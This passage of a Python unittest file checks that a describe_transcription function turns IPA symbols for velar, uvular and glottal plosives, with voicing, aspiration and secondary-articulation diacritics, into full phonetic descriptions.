actual = describe_transcription("g̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized velar plosive pulmonic egressive consonant
def test_kʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʰʲ")
self.assertEqual(actual, expected)
def test_g̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʰʲ")
self.assertEqual(actual, expected)
def test_g̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized velar plosive pulmonic egressive consonant
def test_kʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʰˠ")
self.assertEqual(actual, expected)
def test_g̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʰˠ")
self.assertEqual(actual, expected)
def test_g̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized velar plosive pulmonic egressive consonant
def test_kʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʰˤ")
self.assertEqual(actual, expected)
def test_g̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʰˤ")
self.assertEqual(actual, expected)
def test_g̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʰˤ")
self.assertEqual(actual, expected)
# voiced velar plosive pulmonic egressive consonant
def test_g_is_the_representation_of_the_voiced_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velar plosive pulmonic egressive consonant"
actual = describe_transcription("g")
self.assertEqual(actual, expected)
def test_k̬_is_the_representation_of_the_voiced_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬")
self.assertEqual(actual, expected)
def test_k̬_is_the_representation_of_the_voiced_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬")
self.assertEqual(actual, expected)
# voiced labialized velar plosive pulmonic egressive consonant
def test_gʷ_is_the_representation_of_the_voiced_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʷ")
self.assertEqual(actual, expected)
def test_k̬ʷ_is_the_representation_of_the_voiced_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʷ")
self.assertEqual(actual, expected)
def test_k̬ʷ_is_the_representation_of_the_voiced_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized velar plosive pulmonic egressive consonant
def test_gʲ_is_the_representation_of_the_voiced_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʲ")
self.assertEqual(actual, expected)
def test_k̬ʲ_is_the_representation_of_the_voiced_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʲ")
self.assertEqual(actual, expected)
def test_k̬ʲ_is_the_representation_of_the_voiced_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized velar plosive pulmonic egressive consonant
def test_gˠ_is_the_representation_of_the_voiced_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gˠ")
self.assertEqual(actual, expected)
def test_k̬ˠ_is_the_representation_of_the_voiced_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ˠ")
self.assertEqual(actual, expected)
def test_k̬ˠ_is_the_representation_of_the_voiced_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized velar plosive pulmonic egressive consonant
def test_gˤ_is_the_representation_of_the_voiced_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gˤ")
self.assertEqual(actual, expected)
def test_k̬ˤ_is_the_representation_of_the_voiced_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ˤ")
self.assertEqual(actual, expected)
def test_k̬ˤ_is_the_representation_of_the_voiced_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated velar plosive pulmonic egressive consonant
def test_gʰ_is_the_representation_of_the_voiced_aspirated_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʰ")
self.assertEqual(actual, expected)
def test_g̬ʰ_is_the_representation_of_the_voiced_aspirated_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̬ʰ")
self.assertEqual(actual, expected)
def test_k̬ʰ_is_the_representation_of_the_voiced_aspirated_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized velar plosive pulmonic egressive consonant
def test_gʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʰʷ")
self.assertEqual(actual, expected)
def test_g̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̬ʰʷ")
self.assertEqual(actual, expected)
def test_k̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized velar plosive pulmonic egressive consonant
def test_gʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʰʲ")
self.assertEqual(actual, expected)
def test_g̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̬ʰʲ")
self.assertEqual(actual, expected)
def test_k̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized velar plosive pulmonic egressive consonant
def test_gʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʰˠ")
self.assertEqual(actual, expected)
def test_g̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̬ʰˠ")
self.assertEqual(actual, expected)
def test_k̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized velar plosive pulmonic egressive consonant
def test_gʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʰˤ")
self.assertEqual(actual, expected)
def test_g̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̬ʰˤ")
self.assertEqual(actual, expected)
def test_k̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless uvular plosive pulmonic egressive consonant
def test_q_is_the_representation_of_the_voiceless_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q")
self.assertEqual(actual, expected)
def test_q̊_is_the_representation_of_the_voiceless_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̊")
self.assertEqual(actual, expected)
def test_q̥_is_the_representation_of_the_voiceless_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̥")
self.assertEqual(actual, expected)
def test_ɢ̊_is_the_representation_of_the_voiceless_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊")
self.assertEqual(actual, expected)
def test_ɢ̥_is_the_representation_of_the_voiceless_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥")
self.assertEqual(actual, expected)
# voiceless labialized uvular plosive pulmonic egressive consonant
def test_qʷ_is_the_representation_of_the_voiceless_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʷ")
self.assertEqual(actual, expected)
def test_q̊ʷ_is_the_representation_of_the_voiceless_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̊ʷ")
self.assertEqual(actual, expected)
def test_q̥ʷ_is_the_representation_of_the_voiceless_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̥ʷ")
self.assertEqual(actual, expected)
def test_ɢ̊ʷ_is_the_representation_of_the_voiceless_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʷ")
self.assertEqual(actual, expected)
def test_ɢ̥ʷ_is_the_representation_of_the_voiceless_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized uvular plosive pulmonic egressive consonant
def test_qʲ_is_the_representation_of_the_voiceless_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʲ")
self.assertEqual(actual, expected)
def test_q̊ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̊ʲ")
self.assertEqual(actual, expected)
def test_q̥ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̥ʲ")
self.assertEqual(actual, expected)
def test_ɢ̊ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʲ")
self.assertEqual(actual, expected)
def test_ɢ̥ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized uvular plosive pulmonic egressive consonant
def test_qˠ_is_the_representation_of_the_voiceless_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qˠ")
self.assertEqual(actual, expected)
def test_q̊ˠ_is_the_representation_of_the_voiceless_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̊ˠ")
self.assertEqual(actual, expected)
def test_q̥ˠ_is_the_representation_of_the_voiceless_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̥ˠ")
self.assertEqual(actual, expected)
def test_ɢ̊ˠ_is_the_representation_of_the_voiceless_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ˠ")
self.assertEqual(actual, expected)
def test_ɢ̥ˠ_is_the_representation_of_the_voiceless_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized uvular plosive pulmonic egressive consonant
def test_qˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qˤ")
self.assertEqual(actual, expected)
def test_q̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̊ˤ")
self.assertEqual(actual, expected)
def test_q̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̥ˤ")
self.assertEqual(actual, expected)
def test_ɢ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ˤ")
self.assertEqual(actual, expected)
def test_ɢ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated uvular plosive pulmonic egressive consonant
def test_qʰ_is_the_representation_of_the_voiceless_aspirated_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʰ")
self.assertEqual(actual, expected)
def test_ɢ̥ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʰ")
self.assertEqual(actual, expected)
def test_ɢ̊ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized uvular plosive pulmonic egressive consonant
def test_qʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʰʷ")
self.assertEqual(actual, expected)
def test_ɢ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɢ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized uvular plosive pulmonic egressive consonant
def test_qʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʰʲ")
self.assertEqual(actual, expected)
def test_ɢ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɢ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized uvular plosive pulmonic egressive consonant
def test_qʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʰˠ")
self.assertEqual(actual, expected)
def test_ɢ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɢ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized uvular plosive pulmonic egressive consonant
def test_qʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʰˤ")
self.assertEqual(actual, expected)
def test_ɢ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɢ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced uvular plosive pulmonic egressive consonant
def test_ɢ_is_the_representation_of_the_voiced_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ")
self.assertEqual(actual, expected)
def test_q̬_is_the_representation_of_the_voiced_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬")
self.assertEqual(actual, expected)
def test_q̬_is_the_representation_of_the_voiced_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬")
self.assertEqual(actual, expected)
# voiced labialized uvular plosive pulmonic egressive consonant
def test_ɢʷ_is_the_representation_of_the_voiced_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʷ")
self.assertEqual(actual, expected)
def test_q̬ʷ_is_the_representation_of_the_voiced_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʷ")
self.assertEqual(actual, expected)
def test_q̬ʷ_is_the_representation_of_the_voiced_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized uvular plosive pulmonic egressive consonant
def test_ɢʲ_is_the_representation_of_the_voiced_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʲ")
self.assertEqual(actual, expected)
def test_q̬ʲ_is_the_representation_of_the_voiced_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʲ")
self.assertEqual(actual, expected)
def test_q̬ʲ_is_the_representation_of_the_voiced_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized uvular plosive pulmonic egressive consonant
def test_ɢˠ_is_the_representation_of_the_voiced_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢˠ")
self.assertEqual(actual, expected)
def test_q̬ˠ_is_the_representation_of_the_voiced_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ˠ")
self.assertEqual(actual, expected)
def test_q̬ˠ_is_the_representation_of_the_voiced_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized uvular plosive pulmonic egressive consonant
def test_ɢˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢˤ")
self.assertEqual(actual, expected)
def test_q̬ˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ˤ")
self.assertEqual(actual, expected)
def test_q̬ˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated uvular plosive pulmonic egressive consonant
def test_ɢʰ_is_the_representation_of_the_voiced_aspirated_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʰ")
self.assertEqual(actual, expected)
def test_ɢ̬ʰ_is_the_representation_of_the_voiced_aspirated_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̬ʰ")
self.assertEqual(actual, expected)
def test_q̬ʰ_is_the_representation_of_the_voiced_aspirated_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized uvular plosive pulmonic egressive consonant
def test_ɢʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʰʷ")
self.assertEqual(actual, expected)
def test_ɢ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̬ʰʷ")
self.assertEqual(actual, expected)
def test_q̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized uvular plosive pulmonic egressive consonant
def test_ɢʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʰʲ")
self.assertEqual(actual, expected)
def test_ɢ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̬ʰʲ")
self.assertEqual(actual, expected)
def test_q̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized uvular plosive pulmonic egressive consonant
def test_ɢʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʰˠ")
self.assertEqual(actual, expected)
def test_ɢ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̬ʰˠ")
self.assertEqual(actual, expected)
def test_q̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized uvular plosive pulmonic egressive consonant
def test_ɢʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʰˤ")
self.assertEqual(actual, expected)
def test_ɢ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̬ʰˤ")
self.assertEqual(actual, expected)
def test_q̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless glottal plosive pulmonic egressive consonant
def test_ʔ_is_the_representation_of_the_voiceless_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ")
self.assertEqual(actual, expected)
def test_ʔ̊_is_the_representation_of_the_voiceless_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̊")
self.assertEqual(actual, expected)
def test_ʔ̥_is_the_representation_of_the_voiceless_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔ̥")
self.assertEqual(actual, expected)
# voiceless labialized glottal plosive pulmonic egressive consonant
def test_ʔʷ_is_the_representation_of_the_voiceless_labialized_glottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʔʷ")
self.assertEqual(actual, expected)
